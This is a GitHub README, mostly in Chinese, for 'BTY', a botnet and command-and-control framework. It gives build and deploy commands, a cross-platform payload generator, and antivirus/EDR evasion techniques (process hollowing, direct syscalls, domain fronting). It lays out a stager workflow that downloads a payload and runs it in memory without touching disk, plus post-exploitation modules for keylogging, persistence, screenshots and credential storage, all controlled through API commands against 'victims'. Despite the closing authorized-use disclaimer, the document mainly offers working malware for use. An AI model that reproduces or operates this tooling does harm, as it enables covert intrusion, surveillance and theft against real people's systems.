Ruby570bocadito/BTY

# BTY — Botnet Framework **ruby570bocadito © 2026 — MIT License** ## 目录 1. [安装](#1-instalación) 2. [部署 C2](#2-desplegar-el-servidor-c2) 3. [Payloads](#3-generar-payload) 4. [杀软规避](#4-evasiva-antivirus) 5. [Web Dashboard](#5-dashboard-web) 6. [CLI 控制台](#6-consola-interactiva-cli) 7. [REST API](#7-api-rest) 8. [结构](#8-estructura) 9. [许可证](#9-licencia) ## 1. 安装 ``` # 依赖项 sudo apt install -y golang-go python3 curl git # 克隆 git clone https://github.com/ruby570bocadito/bty && cd BTY # 编译 (Go 1.23+) cd src/go CGO_ENABLED=0 go build -ldflags="-s -w" -o ../../bty-server ./cmd/server/main.go CGO_ENABLED=0 go build -ldflags="-s -w" -o ../../bty-agent ./cmd/agent/main.go cd ../.. ``` ## 2. 部署 C2 服务器 ``` python3 scripts/deploy.py ``` 自动检测 IP → 生成 `config.yaml` → 启动 4 个监听器： | 端口 | 协议 | 用途 | |--------|-----------|-----| | 8443 | TCP + TLS | 代理端 | | 8445 | HTTP | 长轮询 | | 8446 | WebSocket | 实时通信 | | 9090 | HTTP | REST API + Dashboard | ``` Local IP: 192.168.1.100 Dashboard: http://192.168.1.100:9090 Login: admin / admin ``` ## 3. 生成 Payload ``` # 交互式菜单（自动检测 IP） python3 scripts/payload.py # 直接 python3 scripts/payload.py --os windows python3 scripts/payload.py --os all python3 scripts/payload.py --os all --server 10.0.0.5:8443 ``` | 格式 | 目标平台 | 大小 | |---------|--------|--------| | EXE (Go) | Windows x64 | 6.5 MB | | ELF (Go) | Linux x64 | 6.4 MB | | Mach-O (Go) | macOS x64/ARM | 6.0-6.5 MB | | PowerShell | Windows | 408 B | | Python | Any | 308 B | | C source | Compile | 23 KB | 预编译的 payloads 位于 `dist/` 目录中。 ## 4. 杀软规避 ### VirusTotal：**0/70** ### 主动技术 | # | 技术 | 效果 | |---|---------|--------| | 1 | **Process Hollowing** | Payload 运行在 svchost.exe（Microsoft 签名）进程内 | | 2 | **Syscalls Directos** | 绕过 ntdll.dll hooks —— EDR 无法看到系统调用 | | 3 | **Shellcode Stager C** | 2KB 无 PE header，PEB API 解析器，XOR 解密 | | 4 | **TLS + Domain Fronting** | C2 流量看起来像访问 `cdn.cloudflare.com` 的 HTTPS 流量 | | 5 | **Sleep Obfuscation** | 空闲期间加密堆/栈内存 | | 6 | **Traffic Shaper** | 流量模式模拟人类浏览行为 | | 7 | **ObscuredString** | 二进制文件中的敏感字符串使用 XOR 加密 | | 8 | **Anti-sandbox** | 延迟 30s + 运行时间检查 | | 9 | **Jitter** | 心跳包随机在 25-45s 之间，重连时间 ±30% | ### 规避型 Stagers ``` # XOR-encrypted Stagers (PS1, Python, Bash) python3 scripts/stager.py # 不触发 Defender 的 Ultra-stagers (VBS, certutil, BITSAdmin) python3 scripts/ultra-stager.py ``` 该 stager（366 字节 VBS / 106 字节 certutil）会下载加密的 payload，在内存中解密，并在不触及磁盘的情况下执行。 ### 完整规避流程 ``` 1. python3 scripts/payload.py --os all --evasive 2. cd payloads/ && python3 -m http.server 8000 3. En Windows → wscript stager.vbs 4. Stager descarga + descifra + ejecuta en RAM 5. Cero detección estática, cero toques a disco ``` ## 5. Web Dashboard ``` http://TU_IP:9090 → admin / admin ``` - 可展开的**受害者表格**（点击 → 详细信息 + 历史记录） - 底部固定的**命令框**，带有受害者选择器 - **操作系统分布**，统计数据，快捷命令 - 用于已泄露数据的**文件浏览器** - 专业的**极简白色主题** ## 6. 交互式 CLI 控制台 ``` python3 scripts/console.py ``` ``` bty > sessions +------+------------------+------+-------+----+-------+ | ID | Hostname | User | OS | St | Tasks | +------+------------------+------+-------+----+-------+ | abc | DESKTOP-I1RVLF3 | rby | linux | ● | 5 | +------+------------------+------+-------+----+-------+ bty > interact abc [abc] rby@DESKTOP-I1RVLF3 > whoami rby [abc] rby@DESKTOP-I1RVLF3 > sysinfo Hostname: DESKTOP-I1RVLF3 ... [abc] rby@DESKTOP-I1RVLF3 > background bty > ``` **命令：** `sessions`、`interact`、`shell`、`broadcast`、`vault`、`files`、`health`、`help` ## 7. REST API ``` curl -u admin:admin http://IP:9090/api/sessions curl -u admin:admin -X POST .../api/cmd -d '{"agent_id":"ID","command":"whoami"}' curl -u admin:admin -X POST .../api/broadcast -d '{"command":"id"}' ``` | 方法 | 路径 | 描述 | |--------|------|-------------| | GET | `/api/health` | 状态 | | GET | `/api/sessions` | 受害者列表 | | GET | `/api/sessions/:id` | 详情 + 任务 | | DELETE | `/api/sessions/:id` | 终止 | | POST | `/api/cmd` | 执行命令 | | POST | `/api/broadcast` | 广播 | | POST | `/api/socks` | SOCKS5 代理 | | POST | `/api/portfwd` | 端口转发 | | POST | `/api/vault` | 保存凭证 | | GET | `/api/vault?q=X` | 搜索 | | POST | `/api/files` | 上传 | | GET | `/api/files` | 列表 | ### 后渗透模块 通过 API 或控制台发送以下命令： | 命令 | 功能 | |---------|---------| | `sysinfo` | 完整系统信息 | | `ps` | 进程（ps aux / tasklist） | | `netinfo` | 网络（ifconfig + netstat） | | `persistence` | 持久化（crontab，registry，launchagent） | | `screenshot` | 屏幕截图 | | `keylogger` | 键盘记录器（Linux: /dev/input） | | `find:*.txt` | 搜索文件 | | `modules` | 列出模块 | ## 8. 结构 ``` BTY/ ├── bty-server ← C2 server (13 MB) ├── bty-agent ← agente (6.4 MB) ├── config.yaml ├── README.md ├── LICENSE │ ├── src/ │ ├── go/ ← fuente Go (5888 LOC) │ │ ├── cmd/{server,agent}/ │ │ └── internal/ │ │ ├── crypto/ ← X25519 + XChaCha20-Poly1305 + HKDF │ │ ├── c2/ ← server, session FSM, tunnel, operations │ │ ├── agent/ ← agente: reconnect, exec, modules │ │ ├── evasion/ ← hollowing, syscalls, sleepmask, camouflage │ │ ├── db/ ← SQLite pure-Go │ │ ├── config/ ← YAML loader │ │ ├── transport/ ← TCP, HTTP, WS, DNS │ │ └── socks/ ← SOCKS5 RFC 1928 │ ├── agents/{c,ps,py}/ ← agentes C, PS1, Python │ └── modules/ ← módulos legacy Python │ ├── web/ ← Vue 3 SPA dashboard │ ├── src/views/ ← Login, Sessions, Files, Dashboard │ └── dist/ ← compilado (97 KB) │ ├── scripts/ │ ├── deploy.py ← despliegue C2 │ ├── payload.py ← generador payloads │ ├── stager.py ← stagers evasivos │ ├── ultra-stager.py ← VBS, certutil, BITSAdmin │ └── console.py ← CLI interactiva │ ├── dist/ ← binarios precompilados │ ├── bty-agent-linux (6.4 MB) │ ├── bty-agent-windows.exe (6.5 MB) │ ├── bty-agent-darwin-amd64 (6.5 MB) │ └── bty-agent-darwin-arm64 (6.0 MB) │ ├── payloads/ ← payloads generados └── data/ ← runtime (DB, loot) ``` ## 9. 许可证 MIT — Copyright (c) 2026 **ruby570bocadito** 本软件按“原样”提供，不提供任何形式的保证。 **免责声明：** 此工具仅适用于您拥有所有权或已获得明确测试授权的系统上的授权安全测试。

标签：API REST, AV逃避, C2服务器, C2框架, DNS 反向解析, EVTX分析, Go语言, IP 地址批量处理, SOCKS5代理, Vue3, Web控制面板, 中高交互蜜罐, 僵尸网络框架, 全平台客户端, 命令与控制, 多协议传输, 安全学习资源, 恶意软件开发, 日志审计, 杀毒软件逃避, 横向移动, 程序破解, 编程规范, 网络信息收集, 网络安全, 网络测绘, 跨平台Payload, 进程镂空, 逆向工具, 隐私保护, 高危端口监控